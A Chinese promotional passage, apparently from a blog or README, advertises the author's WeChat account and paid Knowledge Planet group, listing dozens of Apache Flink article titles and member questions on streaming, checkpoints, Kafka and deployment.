-另外我自己整理了些 Flink 的学习资料,目前已经全部放到微信公众号了。 -你可以加我的微信:**yuanblog_tzs**,然后回复关键字:**Flink** 即可无条件获取到,转载请联系本人获取授权,违者必究。 - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-17-143454.jpg) - -更多私密资料请加入知识星球! - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-23-124320.jpg) - -有人要问知识星球里面更新什么内容?值得加入吗? - -目前知识星球内已更新的系列文章: - -### 大数据重磅炸弹 - -1、[《大数据重磅炸弹——实时计算引擎 Flink》开篇词](https://t.zsxq.com/fqfuVRR​) - -2、[你公司到底需不需要引入实时计算引擎?](https://t.zsxq.com/emMBaQN​) - -3、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2) ​ - -4、[别再傻傻的分不清大数据框架Flink、Blink、Spark Streaming、Structured Streaming和Storm之间的区别了](https://t.zsxq.com/eAyRz7Y)​ - -5、[Flink 环境准备看这一篇就够了](https://t.zsxq.com/iaMJAe6​)   - -6、[一文讲解从 Flink 环境安装到源码编译运行](https://t.zsxq.com/iaMJAe6​) - -7、[通过 WordCount 程序教你快速入门上手 Flink](https://t.zsxq.com/eaIIiAm)  ​ - -8、[Flink 如何处理 Socket 数据及分析实现过程](https://t.zsxq.com/Vnq72jY​)   - -9、[Flink job 如何在 Standalone、YARN、Mesos、K8S 上部署运行?](https://t.zsxq.com/BiyvFUZ​) - -10、[Flink 数据转换必须熟悉的算子(Operator)](https://t.zsxq.com/fufUBiA) - -11、[Flink 中 Processing Time、Event Time、Ingestion Time 对比及其使用场景分析](https://t.zsxq.com/r7aYB2V) - -12、[如何使用 Flink Window 及 Window 基本概念与实现原理](https://t.zsxq.com/byZbyrb) - -13、[如何使用 DataStream API 来处理数据?](https://t.zsxq.com/VzNBi2r) - -14、[Flink WaterMark 详解及结合 WaterMark 处理延迟数据](https://t.zsxq.com/Iub6IQf) - -15、[基于 Apache Flink 的监控告警系统](https://t.zsxq.com/MniUnqb) - -16、[数据仓库、数据库的对比介绍与实时数仓案例分享](https://t.zsxq.com/v7QzNZ3) - -17、[使用 Prometheus Grafana 监控 Flink](https://t.zsxq.com/uRN3VfA) - - -### 源码系列 - -1、[Flink 源码解析 —— 源码编译运行](https://t.zsxq.com/UZfaYfE) - -2、[Flink 源码解析 —— 项目结构一览](https://t.zsxq.com/zZZjaYf) - -3、[Flink 源码解析—— local 模式启动流程](https://t.zsxq.com/zV7MnuJ) - -4、[Flink 源码解析 —— standalonesession 模式启动流程](https://t.zsxq.com/QZVRZJA) - -5、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Job Manager 启动](https://t.zsxq.com/u3fayvf) - -6、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Task Manager 启动](https://t.zsxq.com/MnQRByb) - -7、[Flink 源码解析 —— 分析 Batch WordCount 程序的执行过程](https://t.zsxq.com/YJ2Zrfi) - -8、[Flink 源码解析 —— 分析 Streaming WordCount 程序的执行过程](https://t.zsxq.com/qnMFEUJ) - -9、[Flink 源码解析 —— 如何获取 JobGraph?](https://t.zsxq.com/naaMf6y) - -10、[Flink 源码解析 —— 如何获取 StreamGraph?](https://t.zsxq.com/qRFIm6I) - -11、[Flink 源码解析 —— Flink JobManager 有什么作用?](https://t.zsxq.com/2VRrbuf) - -12、[Flink 源码解析 —— Flink TaskManager 有什么作用?](https://t.zsxq.com/RZbu7yN) - -13、[Flink 源码解析 —— JobManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ) - -14、[Flink 源码解析 —— TaskManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ) - -15、[Flink 源码解析 —— 深度解析 Flink Checkpoint 机制](https://t.zsxq.com/ynQNbeM) - -16、[Flink 源码解析 —— 深度解析 Flink 序列化机制](https://t.zsxq.com/JaQfeMf) - -17、[Flink 源码解析 —— 深度解析 Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM) - -18、[Flink Metrics 源码解析 —— Flink-metrics-core](https://t.zsxq.com/Mnm2nI6) - -19、[Flink Metrics 源码解析 —— Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6) - -20、[Flink Metrics 源码解析 —— Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6) - -21、[Flink Metrics 源码解析 —— Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6) - -22、[Flink Metrics 源码解析 —— Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6) - -23、[Flink Metrics 源码解析 —— Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6) - -24、[Flink Metrics 源码解析 —— Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6) - -25、[Flink Metrics 源码解析 —— Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6) - -26、[Flink Metrics 源码解析 —— Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6) - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-150037.jpg) - -26、[Flink Annotations 源码解析](https://t.zsxq.com/f6eAu3J) - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-145923.jpg) - -除了《从1到100深入学习Flink》源码学习这个系列文章,《从0到1学习Flink》的案例文章也会优先在知识星球更新,让大家先通过一些 demo 学习 Flink,再去深入源码学习! - -如果学习 Flink 的过程中,遇到什么问题,可以在里面提问,我会优先解答,这里做个抱歉,自己平时工作也挺忙,微信的问题不能做全部做一些解答, -但肯定会优先回复给知识星球的付费用户的,庆幸的是现在星球里的活跃氛围还是可以的,有不少问题通过提问和解答的方式沉淀了下来。 - -1、[为何我使用 ValueState 保存状态 Job 恢复是状态没恢复?](https://t.zsxq.com/62rZV7q) - -2、[flink中watermark究竟是如何生成的,生成的规则是什么,怎么用来处理乱序数据](https://t.zsxq.com/yF2rjmY) - -3、[消费kafka数据的时候,如果遇到了脏数据,或者是不符合规则的数据等等怎么处理呢?](https://t.zsxq.com/uzFIeiq) - -4、[在Kafka 集群中怎么指定读取/写入数据到指定broker或从指定broker的offset开始消费?](https://t.zsxq.com/Nz7QZBY) - -5、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj) - -6、[jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7) - -7、[使用flink-web-ui提交作业并执行 但是/opt/flink/log目录下没有日志文件 请问关于flink的日志(包括jobmanager、taskmanager、每个job自己的日志默认分别存在哪个目录 )需要怎么配置?](https://t.zsxq.com/Nju7EuV) - -8、[通过flink 仪表盘提交的jar 是存储在哪个目录下?](https://t.zsxq.com/6muRz3j) - -9、[从Kafka消费数据进行etl清洗,把结果写入hdfs映射成hive表,压缩格式、hive直接能够读取flink写出的文件、按照文件大小或者时间滚动生成文件](https://t.zsxq.com/uvFQvFu) - -10、[flink jar包上传至集群上运行,挂掉后,挂掉期间kafka中未被消费的数据,在重新启动程序后,是自动从checkpoint获取挂掉之前的kafka offset位置,自动消费之前的数据进行处理,还是需要某些手动的操作呢?](https://t.zsxq.com/ubIY33f) - -11、[flink 启动时不自动创建 上传jar的路径,能指定一个创建好的目录吗](https://t.zsxq.com/UfA2rBy) - -12、[Flink sink to es 集群上报 slot 不够,单机跑是好的,为什么?](https://t.zsxq.com/zBMnIA6) - -13、[Fllink to elasticsearch如何创建索引文档期时间戳?](https://t.zsxq.com/qrZBAQJ) - -14、[blink有没有api文档或者demo,是否建议blink用于生产环境。](https://t.zsxq.com/J2JiIMv) - -15、[flink的Python api怎样?bug多吗?](https://t.zsxq.com/ZVVrjuv) - -16、[Flink VS Spark Streaming VS Storm VS Kafka Stream ](https://t.zsxq.com/zbybQNf) - -17、[你们做实时大屏的技术架构是什么样子的?flume→kafka→flink→redis,然后后端去redis里面捞数据,酱紫可行吗?](https://t.zsxq.com/Zf6meAm) - -18、[做一个统计指标的时候,需要在Flink的计算过程中多次读写redis,感觉好怪,星主有没有好的方案?](https://t.zsxq.com/YniI2JQ) - -19、[Flink 使用场景大分析,列举了很多的常用场景,可以好好参考一下](https://t.zsxq.com/fYZZfYf) - -20、[将kafka中数据sink到mysql时,metadata的数据为空,导入mysql数据不成功???](https://t.zsxq.com/I6eEqR7) - -21、[使用了ValueState来保存中间状态,在运行时中间状态保存正常,但是在手动停止后,再重新运行,发现中间状态值没有了,之前出现的键值是从0开始计数的,这是为什么?是需要实现CheckpointedFunction吗?](https://t.zsxq.com/62rZV7q) - -22、[flink on yarn jobmanager的HA需要怎么配置。还是说yarn给管理了](https://t.zsxq.com/mQ7YbQJ) - -23、[有两个数据流就行connect,其中一个是实时数据流(kafka 读取),另一个是配置流。由于配置流是从关系型数据库中读取,速度较慢,��致实时数据流流入数据的时候,配置信息还未发送,这样会导致有些实时数据读取不到配置信息。目前采取的措施是在connect方法后的flatmap的实现的在open 方法中,提前加载一次配置信息,感觉这种实现方式不友好,请问还有其他的实现方式吗?](https://t.zsxq.com/q3VvB6U) - -24、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj) - -25、[不采用yarm部署flink,还有其他的方案吗? 主要想解决服务器重启后,flink服务怎么自动拉起? jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7) - -26、[在一个 Job 里将同份数据昨晚清洗操作后,sink 到后端多个地方(看业务需求),如何保持一致性?(一个sink出错,另外的也保证不能插入)](https://t.zsxq.com/bYnimQv) - -27、[flink sql任务在某个特定阶段会发生tm和jm丢失心跳,是不是由于gc时间过长呢,](https://t.zsxq.com/YvBAyrV) - -28、[有这样一个需求,统计用户近两周进入产品详情页的来源(1首页大搜索,2产品频道搜索,3其他),为php后端提供数据支持,该信息在端上报事件中,php直接获取有点困难。 我现在的解决方案 通过flink滚动窗口(半小时),统计用户半小时内3个来源pv,然后按照日期序列化,直接写mysql。php从数据库中解析出来,再去统计近两周占比。 问题1,这个需求适合用flink去做吗? 问题2,我的方案总感觉怪怪的,有没有好的方案?](https://t.zsxq.com/fayf2Vv) - -29、[一个task slot 只能同时运行一个任务还是多个任务呢?如果task slot运行的任务比较大,会出现OOM的情况吗?](https://t.zsxq.com/ZFiY3VZ) - -30、[你们怎么对线上flink做监控的,如果整个程序失败了怎么自动重启等等](https://t.zsxq.com/Yn2JqB6) - -31、[flink cep规则动态解析有接触吗?有没有成型的框架?](https://t.zsxq.com/YFMFeaA) - -32、[每一个Window都有一个watermark吗?window是怎么根据watermark进行触发或者销毁的?](https://t.zsxq.com/VZvRrjm) - -33、[ CheckPoint与SavePoint的区别是什么?](https://t.zsxq.com/R3ZZJUF) - -34、[flink可以在算子中共享状态吗?或者大佬你有什么方法可以共享状态的呢?](https://t.zsxq.com/Aa62Bim) - -35、[运行几分钟就报了,看taskmager日志,报的是 failed elasticsearch bulk request null,可是我代码里面已经做过空值判断了呀 而且也过滤掉了,flink版本1.7.2 es版本6.3.1](https://t.zsxq.com/ayFmmMF) - -36、[这种情况,我们调并行度 还是配置参数好](https://t.zsxq.com/Yzzzb2b) - -37、[大家都用jdbc写,各种数据库增删查改拼sql有没有觉得很累,ps.set代码一大堆,还要计算每个参数的位置](https://t.zsxq.com/AqBUR3f) - -38、[关于datasource的配置,每个taskmanager对应一个datasource?还是每个slot? 实际运行下来,每个slot中datasorce线程池只要设置1就行了,多了也用不到?](https://t.zsxq.com/AqBUR3f) - -39、[kafka现在每天出现数据丢失,现在小批量数据,一天200W左右, kafka版本为 1.0.0,集群总共7个节点,TOPIC有十六个分区,单条报文1.5k左右](https://t.zsxq.com/AqBUR3f) - -40、[根据key.hash的绝对值 对并发度求模,进行分组,假设10各并发度,实际只有8个分区有处理数据,有2个始终不处理,还有一个分区处理的数据是其他的三倍,如截图](https://t.zsxq.com/AqBUR3f) - -41、[flink每7小时不知道在处理什么, CPU 负载 每7小时,有一次高峰,5分钟内平均负载超过0.8,如截图](https://t.zsxq.com/AqBUR3f) - -42、[有没有Flink写的项目推荐?我想看到用Flink写的整体项目是怎么组织的,不单单是一个单例子](https://t.zsxq.com/M3fIMbu) - -43、[Flink 源码的结构图](https://t.zsxq.com/yv7EQFA) - -44、[我想根据不同业务表(case when)进行不同的redis sink(hash ,set),我要如何操作?](https://t.zsxq.com/vBAYNJq) - -45、[这个需要清理什么数据呀,我把hdfs里面的已经清理了 启动还是报这个](https://t.zsxq.com/b2zbUJa) - -46、[ 在流处理系统,在机器发生故障恢复之后,什么情况消息最多会被处理一次?什么情况消息最少会被处理一次呢?](https://t.zsxq.com/QjQFmQr) - -47、[我检查点都调到5分钟了,这是什么问题](https://t.zsxq.com/zbQNfuJ) - -48、[reduce方法后 那个交易时间 怎么不是最新的,是第一次进入的那个时间,](https://t.zsxq.com/ZrjEauN) - -49、[Flink on Yarn 模式,用yarn session脚本启动的时候,我在后台没有看到到Jobmanager,TaskManager,ApplicationMaster这几个进程,想请问一下这是什么原因呢?因为之前看官网的时候,说Jobmanager就是一个jvm进程,Taskmanage也是一个JVM进程](https://t.zsxq.com/VJyr3bM) - -50、[Flink on Yarn的时候得指定 多少个TaskManager和每个TaskManager slot去运行任务,这样做感觉不太合理,因为用户也不知道需要多少个TaskManager适合,Flink 有动态启动TaskManager的机制吗。](https://t.zsxq.com/VJyr3bM) - -51、[参考这个例子,Flink 零基础实战教程:如何计算实时热门商品 | Jark's Blog, 窗口聚合的时候,用keywindow,用的是timeWindowAll,然后在aggregate的时候用aggregate(new CustomAggregateFunction(), new CustomWindowFunction()),打印结果后,发现窗口中一直使用的重复的数据,统计的结果也不变,去掉CustomWindowFunction()就正常了 ? 非常奇怪](https://t.zsxq.com/UBmUJMv) - -52、[用户进入产品预定页面(端埋点上报),并填写了一些信息(端埋点上报),但半小时内并没有产生任何订单,然后给该类用户发送一个push。 1. 这种需求适合用flink去做吗?2. 如果适合,说下大概的思路](https://t.zsxq.com/naQb6aI) - -53、[业务场景是实时获取数据存redis,请问我要如何按天、按周、按月分别存入redis里?(比方说过了一天自动换一个位置存redis)](https://t.zsxq.com/AUf2VNz) - -54、[有人 AggregatingState 的例子吗, 感觉官方的例子和 官网的不太一样?](https://t.zsxq.com/UJ6Y7m2) - -55、[flink-jdbc这个jar有吗?怎么没找到啊?1.8.0的没找到,1.6.2的有](https://t.zsxq.com/r3BaAY3) - -56、[现有个关于savepoint的问题,操作流程为,取消任务时设置保存点,更新任务,从保存点启动任务;现在遇到个问题,假设我中间某个算子重写,原先通过state编写,有用定时器,现在更改后,采用窗口,反正就是实现方式完全不一样;从保存点启动就会一直报错,重启,原先的保存点不能还原,此时就会有很多数据重复等各种问题,如何才能保证数据不丢失,不重复等,恢复到停止的时候,现在想到的是记下kafka的偏移量,再做处理,貌似也不是很好弄,有什么解决办法吗](https://t.zsxq.com/jiybIee) - -57、[需要在flink计算app页面访问时长,消费Kafka计算后输出到Kafka。第一条log需要等待第二条log的时间戳计算访问时长。我想问的是,flink是分布式的,那么它能否保证执行的顺序性?后来的数据有没有可能先被执行?](https://t.zsxq.com/eMJmiQz) - -58、[我公司想做实时大屏,现有技术是将业务所需指标实时用spark拉到redis里存着,然后再用一条spark streaming流计算简单乘除运算,指标包含了各月份的比较。请问我该如何用flink简化上述流程?](https://t.zsxq.com/Y7e6aIu) - -59、[flink on yarn 方式,这样理解不知道对不对,yarn-session这个脚本其实就是准备yarn环境的,执行run任务的时候,根据yarn-session初始化的yarnDescription 把 flink 任务的jobGraph提交到yarn上去执行](https://t.zsxq.com/QbIayJ6) - -60、[同样的代码逻辑写在单独的main函数中就可以成功的消费kafka ,写在一个spring boot的程序中,接受外部请求,然后执行相同的逻辑就不能消费kafka。你遇到过吗?能给一些查问题的建议,或者在哪里打个断点,能看到为什么消费不到kafka的消息呢?](https://t.zsxq.com/VFMRbYN) - -61、[请问下flink可以实现一个流中同时存在订单表和订单商品表的数据 两者是一对多的关系 能实现得到 以订单表为主 一个订单多个商品 这种需求嘛](https://t.zsxq.com/QNvjI6Q) - -62、[在用中间状态的时候,如果中间一些信息保存在state中,有没有必要在redis中再保存一份,来做第三方的存储。](https://t.zsxq.com/6ie66EE) - -63、[能否出一期flink state的文章。什么场景下用什么样的state?如,最简单的,实时累加update到state。](https://t.zsxq.com/bm6mYjI) - -64、[flink的双流join博主有使用的经验吗?会有什么常见的问题吗](https://t.zsxq.com/II6AEe2) - -65、[窗口触发的条件问题](https://t.zsxq.com/V7EmUZR) - -66、[flink 定时任务怎么做?有相关的demo么?](https://t.zsxq.com/JY3NJam) - -67、[流式处理过程中数据的一致性如何保证或者如何检测](https://t.zsxq.com/7YZ3Fuz) - -68、[重启flink单机集群,还报job not found 异常。](https://t.zsxq.com/nEEQvzR) - -69、[kafka的数据是用 org.apache.kafka.common.serialization.ByteArraySerialize序列化的,flink这边消费的时候怎么通过FlinkKafkaConsumer创建DataStream?](https://t.zsxq.com/qJyvzNj) - -70、[现在公司有一个需求,一些用户的支付日志,通过sls收集,要把这些日志处理后,结果写入到MySQL,关键这些日志可能连着来好几条才是一个用户的,因为发起请求,响应等每个环节都有相应的日志,这几条日志综合处理才能得到最终的结果,请问博主有什么好的方法没有?](https://t.zsxq.com/byvnaEi) - -71、[flink 支持hadoop 主备么? hadoop主节点挂了 flink 会切换到hadoop 备用节点?](https://t.zsxq.com/qfie6qR) - -72、[��教大家: 实际 flink 开发中用 scala 多还是 java多些? 刚入手 flink 大数据 scala 需要深入学习么?](https://t.zsxq.com/ZVZzZv7) - -73、[我使用的是flink是1.7.2最近用了split的方式分流,但是底层的SplitStream上却标注为Deprecated,请问是官方不推荐使用分流的方式吗?](https://t.zsxq.com/Qzbi6yn) - -74、[KeyBy 的正确理解,和数据倾斜问题的解释](https://t.zsxq.com/Auf2NVR) - -75、[用flink时,遇到个问题 checkpoint大概有2G左右, 有背压时,flink会重启有遇到过这个问题吗](https://t.zsxq.com/3vnIm62) - -76、[flink使用yarn-session方式部署,如何保证yarn-session的稳定性,如果yarn-session挂了,需要重新部署一个yarn-session,如何恢复之前yarn-session上的job呢,之前的checkpoint还能使用吗?](https://t.zsxq.com/URzVBIm) - -77、[我想请教一下关于sink的问题。我现在的需求是从Kafka消费Json数据,这个Json数据字段可能会增加,然后将拿到的json数据以parquet的格式存入hdfs。现在我可以拿到json数据的schema,但是在保存parquet文件的时候不知道怎么处理。一是flink没有专门的format parquet,二是对于可变字段的Json怎么处理成parquet比较合适?](https://t.zsxq.com/MjyN7Uf) - -78、[flink如何在较大的数据量中做去重计算。](https://t.zsxq.com/6qBqVvZ) - -79、[flink能在没有数据的时候也定时执行算子吗?](https://t.zsxq.com/Eqjyju7) - -80、[使用rocksdb状态后端,自定义pojo怎么实现序列化和反序列化的,有相关demo么?](https://t.zsxq.com/i2zVfIi) - -81、[check point 老是失败,是不是自定义的pojo问题?到本地可以,到hdfs就不行,网上也有很多类似的问题 都没有一个很好的解释和解决方案](https://t.zsxq.com/vRJujAi) - -82、[cep规则如图,当start事件进入时,时间00:00:15,而后进入end事件,时间00:00:40。我发现规则无法命中。请问within 是从start事件开始计时?还是跟window一样根据系统时间划分的?如果是后者,请问怎么配置才能从start开始计时?](https://t.zsxq.com/MVFmuB6) - -83、[Flink聚合结果直接写Mysql的幂等性设计问题](https://t.zsxq.com/EybM3vR) - -84、[Flink job打开了checkpoint,用的rocksdb,通过观察hdfs上checkpoint目录,为啥算副本总量会暴增爆减](https://t.zsxq.com/62VzNRF) - -85、[Flink 提交任务的 jar包可以指定路径为 HDFS 上的吗]() - -86、[在flink web Ui上提交的任务,设置的并行度为2,flink是stand alone部署的。两个任务都正常的运行了几天了,今天有个地方逻辑需要修改,于是将任务cancel掉(在命令行cancel也试了),结果taskmanger挂掉了一个节点。后来用其他任务试了,也同样会导致节点挂掉](https://t.zsxq.com/VfimieI) - -87、[一个配置动态更新的问题折腾好久(配置用个静态的map变量存着,有个线程定时去数据库捞数据然后存在这个map里面更新一把),本地 idea 调试没问题,集群部署就一直报 空指针异常。下游的算子使用这个静态变量map去get key在集群模式下会出现这个空指针异常,估计就是拿不到 map](https://t.zsxq.com/nee6qRv) - -88、[批量写入MySQL,完成HBase批量写入](https://t.zsxq.com/3bEUZfQ) - -89、[用flink清洗数据,其中要访问redis,根据redis的结果来决定是否把数据传递到下流,这有可能实现吗?](https://t.zsxq.com/Zb6AM3V) - -90、[监控页面流处理的时候这个发送和接收字节为0。](https://t.zsxq.com/RbeYZvb) - -91、[sink到MySQL,如果直接用idea的话可以运行,并且成功,大大的代码上面用的FlinkKafkaConsumer010,而我的Flink版本为1.7,kafka版本为2.12,所以当我用FlinkKafkaConsumer010就有问题,于是改为 - FlinkKafkaConsumer就可以直接在idea完成sink到MySQL,但是为何当我把该程序打成Jar包,去运行的时候,就是报FlinkKafkaConsumer找不到呢](https://t.zsxq.com/MN7iuZf) - -92、[SocketTextStreamWordCount中输入中文统计不出来,请问这个怎么解决,我猜测应该是需要修改一下代码,应该是这个例子默认统计英文](https://t.zsxq.com/e2VNN7Y) - -93、[ Flink 应用程序本地 ide 里面运行的时候并行度是怎么算的?](https://t.zsxq.com/RVRn6AE) - -94、[ 请问下flink中对于窗口的全量聚合有apply和process两种 他们有啥区别呢](https://t.zsxq.com/rzbIQBi) - -95、[不知道大大熟悉Hbase不,我想直接在Hbase中查询某一列数据,因为有重复数据,所以想使用distinct统计实际数据量,请问Hbase中有没有类似于sql的distinct关键字。如果没有,想实现这种可以不?](https://t.zsxq.com/UJIubub) - -96、[ 来分析一下现在Flink,Kafka方面的就业形势,以及准备就业该如何准备的这方面内容呢?](https://t.zsxq.com/VFaQn2j) - -97、[ 大佬知道flink的dataStream可以转换为dataSet吗?因为数据需要11分钟一个批次计算��六个指标,并且涉及好几步reduce,计算的指标之间有联系,用Stream卡住了。](https://t.zsxq.com/Zn2FEQZ) - -98、[1.如何在同一窗口内实现多次的聚合,比如像spark中的这样2.多个实时流的jion可以用window来处理一批次的数据吗?](https://t.zsxq.com/aIqjmQN) - -99、[写的批处理的功能,现在本机跑是没问题的,就是在linux集群上出现了问题,就是不知道如果通过本地调用远程jar包然后传参数和拿到结果参数返回本机](https://t.zsxq.com/ZNvb2FM) - -100、[我用standalone开启一个flink集群,上传flink官方用例Socket Window WordCount做测试,开启两个parallelism能正常运行,但是开启4个parallelism后出现错误](https://t.zsxq.com/femmiqf) - -101、[ 有使用AssignerWithPunctuatedWatermarks 的案例Demo吗?网上找了都是AssignerWithPeriodicWatermarks的,不知道具体怎么使用?](https://t.zsxq.com/YZ3vbY3) - -102、[ 有一个datastream(从文件读取的),然后我用flink sql进行计算,这个sql是一个加总的运算,然后通过retractStreamTableSink可以把文件做sql的结果输出到文件吗?这个输出到文件的接口是用什么呢?](https://t.zsxq.com/uzFyVJe) - -103、[ 为啥split这个流设置为过期的](https://t.zsxq.com/6QNNrZz) - -104、[ 需要使用flink table的水印机制控制时间的乱序问题,这种场景下我就使用水印+窗口了,我现在写的demo遇到了问题,就是在把触发计算的窗口table(WindowedTable)转换成table进行sql操作时发现窗口中的数据还是乱序的,是不是flink table的WindowedTable不支持水印窗口转table-sql的功能](https://t.zsxq.com/Q7YNRBE) - -105、[ Flink 对 SQL 的重视性](https://t.zsxq.com/Jmayrbi) - -106、[ flink job打开了checkpoint,任务跑了几个小时后就出现下面的错,截图是打出来的日志,有个OOM,又遇到过的没?](https://t.zsxq.com/ZrZfa2Z) - -107、[ 本地测试是有数据的,之前该任务放在集群也是有数据的,可能提交过多次,现在读不到数据了 group id 也换过了, 只能重启集群解决么?](https://t.zsxq.com/emaAeyj) - -108、[使用flink清洗数据存到es中,直接在flatmap中对处理出来的数据用es自己的ClientInterface类直接将数据存入es当中,不走sink,这样的处理逻辑是不是会有问题。](https://t.zsxq.com/ayBa6am) - -108、[ flink从kafka拿数据(即增量数据)与存量数据进行内存聚合的需求,现在有一个方案就是程序启动的时候先用flink table将存量数据加载到内存中创建table中,然后将stream的增量数据与table的数据进行关联聚合后输出结束,不知道这种方案可行么。目前个人认为有两个主要问题:1是增量数据stream转化成append table后不知道能与存量的table关联聚合不,2是聚合后输出的结果数据是否过于频繁造成网络传输压力过大](https://t.zsxq.com/QNvbE62) - -109、[ 设置时间时间特性有什么区别呢, 分别在什么场景下使用呢?两种设置时间延迟有什么区别呢 , 分别在什么场景下使用](https://t.zsxq.com/yzjAQ7a) - -110、[ flink从rabbitmq中读取数据,设置了rabbitmq的CorrelationDataId和checkpoint为EXACTLY_ONCE;如果flink完成一次checkpoint后,在这次checkpoint之前消费的数据都会从mq中删除。如果某次flink停机更新,那就会出现mq中的一些数据消费但是处于Unacked状态。在flink又重新开启后这批数据又会重新消费。那这样是不是就不能保证EXACTLY_ONCE了](https://t.zsxq.com/qRrJEaa) - -111、[1. 在Flink checkpoint 中, 像 operator的状态信息 是在设置了checkpoint 之后自动的进行快照吗 ?2. 上面这个和我们手动存储的 Keyed State 进行快照(这个应该是增量快照)](https://t.zsxq.com/mAqn2RF) - -112、[现在有个实时商品数,交易额这种统计需求,打算用 flink从kafka读取binglog日志进行计算,但binglog涉及到insert和update这种操作时 怎么处理才能统计准确,避免那种重复计算的问题?](https://t.zsxq.com/E2BeQ3f) - -113、[我这边用flink做实时监控,功能很简单,就是每条消息做keyby然后三分钟窗口,然后做些去重操作,触发阈值则报警,现在问题是同一个时间窗口同一个人的告警会触发两次,集群是三台机器,standalone cluster,初步结果是三个算子里有两个收到了同样的数据](https://t.zsxq.com/vjIeyFI) - -114、[在使用WaterMark的时候,默认是每200ms去设置一次watermark,那么每个taskmanager之间,由于得到的数据不同,所以往往产生的最大的watermark不同。 那么这个时候,是各个taskmanager广播这个watermark,得到全局的最大的watermark,还是说各个taskmanager都各自用自己的watermark。主要没看到广播watermark的源码。不知道是自己观察不仔细还是就是没有广播这个变量。](https://t.zsxq.com/unq3FIa) - -115、[现在遇到一个需求,需要��job内部定时去读取redis的信息,想请教flink能实现像普通程序那样的定时任务吗?](https://t.zsxq.com/AeUnAyN) - -116、[有个触发事件开始聚合,等到数量足够,或者超时则sink推mq 环境 flink 1.6 用了mapState 记录触发事件 1 数据足够这个OK 2 超时state ttl 1.6支持,但是问题来了,如何在超时时候增加自定义处理?](https://t.zsxq.com/z7uZbY3) - -117、[请问impala这种mpp架构的sql引擎,为什么稳定性比较差呢?](https://t.zsxq.com/R7UjeUF) - -118、[watermark跟并行度相关不是,过于全局了,期望是keyby之后再针对每个keyed stream 打watermark,这个有什么好的实践呢?](https://t.zsxq.com/q7myfAQ) - -119、[请问如果把一个文件的内容读取成datastream和dataset,有什么区别吗??他们都是一条数据一条数据的被读取吗?](https://t.zsxq.com/rB6yfeA) - -120、[有没有kylin相关的资料,或者调优的经验?](https://t.zsxq.com/j2j6EyJ) - -121、[flink先从jdbc读取配置表到流中,另外从kafka中新增或者修改这个配置,这个场景怎么把两个流一份配置流?我用的connect,接着发不成广播变量,再和实体流合并,但在合并时报Exception in thread ""main"" java.lang.IllegalArgumentException](https://t.zsxq.com/iMjmQVV) - -122、[Flink exactly-once,kafka版本为0.11.0 ,sink基于FlinkKafkaProducer 每五分钟一次checkpoint,但是checkpoint开始后系统直接卡死,at-lease-once 一分钟能完成的checkpoint, 现在十分钟无法完成没进度还是0, 不知道哪里卡住了](https://t.zsxq.com/RFQNFIa) - -123、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2) - -124、[Flink异步IO中,下图这两种有什么区别?为啥要加 CompletableFuture.supplyAsync,不太明白?](https://t.zsxq.com/NJq3rj2) - -125、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2) - -126、[有个计算场景,从kafka消费两个数据源,两个数据结构都有时间段概念,计算需要做的是匹配两个时间段,匹配到了,就生成一条新的记录。请问使用哪个工具更合适,flink table还是cep?请大神指点一下 我这边之前的做法,将两个数据流转为table.两个table over window后join成新的表。结果job跑一会就oom.](https://t.zsxq.com/rniUrjm) - -127、[一个互联网公司,或者一个业务系统,如果想做一个全面的监控要怎么做?有什么成熟的方案可以参考交流吗?有什么有什么度量指标吗?](https://t.zsxq.com/vRZ7qJ2) - -128、[怎么深入学习flink,或者其他大数据组件,能为未来秋招找一份大数据相关(计算方向)的工作增加自己的竞争力?](https://t.zsxq.com/3vfyJau) - -129、[oppo的实时数仓,其中明细层和汇总层都在kafka中,他们的关系库的实时数据也抽取到kafka的ods,那么在构建数仓的,需要join 三四个大业务表,业务表会变化,那么是大的业务表是从kafka的ods读取吗?实时数仓,多个大表join可以吗](https://t.zsxq.com/VBIunun) - -130、[Tuple类型有什么方法转换成json字符串吗?现在的场景是,结果在存储到sink中时希望存的是json字符串,这样应用程序获取数据比较好转换一点。如果Tuple不好转换json字符串,那么应该以什么数据格式存储到sink中](https://t.zsxq.com/vnaURzj) - -140、[端到端的数据保证,是否意味着中间处理程序中断,也不会造成该批次处理失败的消息丢失,处理程序重新启动之后,会再次处理上次未处理的消息](https://t.zsxq.com/J6eAmYb) - -141、[关于flink datastream window相关的。比如我现在使用滚动窗口,统计一周内去重用户指标,按照正常watermark触发计算,需要等到当前周的window到达window的endtime时,才会触发,这样指标一周后才能产出结果。我能不能实现一小时触发一次计算,每次统计截止到当前时间,window中所有到达元素的去重数量。](https://t.zsxq.com/7qBMrBe) - -142、[FLIP-16 Loop Fault Tolerance 是讲现在的checkpoint机制无法在stream loop的时候容错吗?现在这个问题解决了没有呀?](https://t.zsxq.com/uJqzBIe) - 